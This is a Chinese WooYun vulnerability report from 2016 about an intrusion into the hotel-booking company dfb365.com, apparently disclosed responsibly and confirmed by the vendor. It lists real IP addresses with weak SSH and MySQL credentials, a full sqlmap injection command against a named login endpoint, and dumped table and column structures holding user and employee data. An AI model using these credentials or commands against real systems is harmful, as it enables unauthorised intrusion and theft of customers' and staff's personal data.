当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188591

漏洞标题:订房宝内部系统一日游(涉及多个重要系统\几十万用户数据\几万商户信息\员工账户\含密码)

相关厂商:dfb365.com

漏洞作者: 路淫甲

提交时间:2016-03-24 21:30

修复时间:2016-05-08 21:50

公开时间:2016-05-08 21:50

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-24: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-04-03: 细节向核心白帽子及相关领域专家公开
2016-04-13: 细节向普通白帽子公开
2016-04-23: 细节向实习白帽子公开
2016-05-08: 细节向公众公开

简要描述:

杀入订房宝,活捉苍井空
下面开始寻找苍老师的寻梦路程...

详细说明:

涉及系统:renaming、mail、cs等等
一些列问题直入内网,涉及各种用户数据
问题ip

1.png


首显是ssh弱口令,root权限,直入内网
ssh://114.215.150.232:8200
admin admin

2.png


3.1.png


外网3306是可以连的,不过admin没什么数据,root不可外连
mysql://114.215.150.232:3306
admin admin

3.png


内网本地mysql,root\root可连

4.png


5.png


技术部门的邮箱和密码就泄露了

6.png


组织架构:

7.png


公司架构里并没有“苍老师”,好失望!!!

8.png


项目信息:

9.png


10.png


11.png


12.png


13.png


14.png

漏洞证明:

SQL注入:
http://cs.dfb365.com/user/login.action
http://115.28.131.8:8082/user/login.action
sqlmap.py -u "http://115.28.131.8:8082/user/dologin.action" --data="model.email=admin*&model.password=123123" --threads=10 --tables -D "dfb356db2"
登录的位置就是注入点,登录后所有搜索框都是注入点

a1.png


各种用户表
[15:25:08] [INFO] resumed: 134
[15:25:08] [INFO] resumed: action
[15:25:08] [INFO] resumed: activity
[15:25:08] [INFO] resumed: activity_business_record
[15:25:08] [INFO] resumed: activity_code
[15:25:08] [INFO] resumed: activity_hotel
[15:25:08] [INFO] resumed: activity_weixin
[15:25:08] [INFO] resumed: advertisement
[15:25:08] [INFO] resumed: advertisement_sort
[15:25:08] [INFO] resumed: app
[15:25:08] [INFO] resumed: b_log
[15:25:08] [INFO] resumed: basic_hotel_report
[15:25:08] [INFO] resumed: charge_refund_record
[15:25:08] [INFO] resumed: circle
[15:25:08] [INFO] resumed: city
[15:25:08] [INFO] resumed: district
[15:25:08] [INFO] resumed: employee
[15:25:08] [INFO] resumed: group
[15:25:08] [INFO] resumed: hotel
[15:25:08] [INFO] resumed: hotel_access_token
[15:25:08] [INFO] resumed: hotel_account
[15:25:08] [INFO] resumed: hotel_addition
[15:25:08] [INFO] resumed: hotel_auto_sell
[15:25:08] [INFO] resumed: hotel_bill
[15:25:08] [INFO] resumed: hotel_bomment
[15:25:08] [INFO] resumed: hotel_contact_person
[15:25:08] [INFO] resumed: hotel_dictionary
[15:25:08] [INFO] resumed: hotel_excellent
[15:25:08] [INFO] resumed: hotel_group
[15:25:08] [INFO] resumed: hotel_profile
[15:25:08] [INFO] resumed: hotel_recommended
[15:25:08] [INFO] resumed: hotel_service_fee
[15:25:08] [INFO] resumed: hotel_spread
[15:25:08] [INFO] resumed: hotel_spread_report
[15:25:08] [INFO] resumed: hotel_spread_withdraw
[15:25:08] [INFO] resumed: hotel_topic
[15:25:08] [INFO] resumed: interior
[15:25:08] [INFO] resumed: interior_bak
[15:25:08] [INFO] resumed: ip_access_count
[15:25:08] [INFO] resumed: ip_restrict
[15:25:08] [INFO] resumed: k_action
[15:25:08] [INFO] resumed: k_link_role_action
[15:25:08] [INFO] resumed: k_link_user_hotel
[15:25:08] [INFO] resumed: k_link_user_role
[15:25:08] [INFO] resumed: k_role
[15:25:08] [INFO] resumed: k_user
[15:25:08] [INFO] resumed: link_activity_hotel
[15:25:08] [INFO] resumed: link_activity_order
[15:25:08] [INFO] resumed: link_activity_passport
[15:25:08] [INFO] resumed: link_emp_role
[15:25:08] [INFO] resumed: link_hotel_city
[15:25:08] [INFO] resumed: link_hotel_group
[15:25:08] [INFO] resumed: link_hotel_photo
[15:25:08] [INFO] resumed: link_hotel_service
[15:25:08] [INFO] resumed: link_order_charge
[15:25:08] [INFO] resumed: link_order_coupon
[15:25:08] [INFO] resumed: link_response_room
[15:25:08] [INFO] resumed: link_response_room_bak
[15:25:08] [INFO] resumed: link_role_action
[15:25:08] [INFO] resumed: link_room_photo
[15:25:08] [INFO] resumed: link_room_price
[15:25:08] [INFO] resumed: link_room_state
[15:25:08] [INFO] resumed: link_sale_hotel
[15:25:08] [INFO] resumed: link_user_activitycode
[15:25:08] [INFO] resumed: link_wf_biztable
[15:25:08] [INFO] resumed: link_wf_refuse
[15:25:08] [INFO] resumed: location_airport
[15:25:08] [INFO] resumed: location_circle
[15:25:08] [INFO] resumed: location_city
[15:25:08] [INFO] resumed: location_district
[15:25:08] [INFO] resumed: location_line
[15:25:08] [INFO] resumed: location_station
[15:25:08] [INFO] resumed: location_subway
[15:25:08] [INFO] resumed: locomotor_activity
[15:25:08] [INFO] resumed: locomotor_activity_summary
[15:25:08] [INFO] resumed: locomotor_banner_summary
[15:25:08] [INFO] resumed: locomotor_type
[15:25:08] [INFO] resumed: mail_user
[15:25:08] [INFO] resumed: online_user
[15:25:08] [INFO] resumed: order_main
[15:25:08] [INFO] resumed: order_main_bak
[15:25:08] [INFO] resumed: order_main_temp
[15:25:08] [INFO] resumed: order_request
[15:25:08] [INFO] resumed: order_request_bak
[15:25:08] [INFO] resumed: order_response
[15:25:08] [INFO] resumed: order_response_bak
[15:25:08] [INFO] resumed: order_time
[15:25:08] [INFO] resumed: order_tohotels
[15:25:08] [INFO] resumed: order_user_infos_temp
[15:25:08] [INFO] resumed: pay_way_temp
[15:25:08] [INFO] resumed: photo
[15:25:08] [INFO] resumed: pingpp_charge
[15:25:08] [INFO] resumed: played_bills
[15:25:08] [INFO] resumed: policy
[15:25:08] [INFO] resumed: policy_action_hotel
[15:25:08] [INFO] resumed: policy_condition_hotel
[15:25:08] [INFO] resumed: red_envelop
[15:25:08] [INFO] resumed: red_envelope_link
[15:25:08] [INFO] resumed: role
[15:25:08] [INFO] resumed: room
[15:25:08] [INFO] resumed: room_auto_sell
[15:25:08] [INFO] resumed: room_prices
[15:25:08] [INFO] resumed: room_prices_temp
[15:25:08] [INFO] resumed: sms_verify_code
[15:25:08] [INFO] resumed: sys_dict
[15:25:08] [INFO] resumed: t_hotel_btoc
[15:25:08] [INFO] resumed: t_hotel_irect_log
[15:25:08] [INFO] resumed: t_promotion_detail
[15:25:08] [INFO] resumed: t_promotion_staff
[15:25:08] [INFO] resumed: test_weixin
[15:25:08] [INFO] resumed: threepart_token
[15:25:08] [INFO] resumed: threepart_user
[15:25:08] [INFO] resumed: tor_business_city
[15:25:08] [INFO] resumed: tor_hotel_direct
[15:25:08] [INFO] resumed: user
[15:25:08] [INFO] resumed: user_access_token
[15:25:08] [INFO] resumed: user_account
[15:25:08] [INFO] resumed: user_account_history
[15:25:08] [INFO] resumed: user_credit
[15:25:08] [INFO] resumed: user_passport
[15:25:08] [INFO] resumed: user_passport_list
[15:25:08] [INFO] resumed: user_pay
[15:25:08] [INFO] resumed: user_push_token
[15:25:08] [INFO] resumed: user_spread
[15:25:08] [INFO] resumed: user_statistics
[15:25:08] [INFO] resumed: weixin_user
[15:25:08] [INFO] resumed: wf_advice
[15:25:08] [INFO] resumed: wf_def
[15:25:08] [INFO] resumed: wf_node
[15:25:08] [INFO] resuming partial value: wf_node_pers
............
Database: dfb356db2
Table: employee
[12 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| account | varchar(30) |
| email | varchar(60) |
| has_update | char(1) |
| hotel_id | bigint(20) |
| id | bigint(20) |
| is_del | char(1) |
| is_direct | char(1) |
| is_manager | int(1) |
| mobile | char(20) |
| name | varchar(100) |
| password | char(40) |
| status | char(1) |
+------------+--------------+

a2.png


a3.png


Database: dfb356db2
Table: user
[13 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| device_id | varchar(50) |
| device_type | varchar(20) |
| email | varchar(50) |
| imei | varchar(50) |
| login_time | datetime |
| open_id | varchar(50) |
| password | varchar(50) |
| phone_number | varchar(50) |
| register_time | datetime |
| score | int(11) |
| source_from | varchar(20) |
| user_id | bigint(20) |
| user_name | varchar(50) |
+---------------+-------------+

a4.png


还是没有找到“苍老师”!!

修复方案:

不玩了

版权声明:转载请注明来源 路淫甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-24 21:50

厂商回复:

漏洞修复中,很感谢, 路淫甲和乌云,我的联系方式 zhesheng.

最新状态:

暂无